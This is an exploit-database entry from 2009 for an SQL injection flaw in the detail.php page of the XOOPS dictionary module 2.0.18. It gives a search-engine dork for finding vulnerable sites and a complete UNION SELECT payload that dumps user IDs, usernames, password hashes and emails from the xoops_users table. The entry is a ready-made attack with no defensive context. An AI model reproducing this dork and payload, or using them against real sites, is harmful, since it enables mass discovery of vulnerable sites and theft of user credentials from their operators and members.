XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability

2009-12-30T00:00:00
ID 1337DAY-ID-10522
Type zdt
Reporter Palyo34
Modified 2009-12-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================================
XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
=======================================================================

##########################################
#
#  XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
#
#  XOOPS Version:  XOOPS 2.0.18
#
#  http://www.xoops.org/modules/repository/
#
##########################################
#
# DORK  : allinurl: "modules/dictionary/detail.php?id"
#
###########################################
#  
#   EXPLOIT :
#
#     modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pass,email),5,6+from+xoops_users--
#
##############################################



#  0day.today [2018-02-18]  #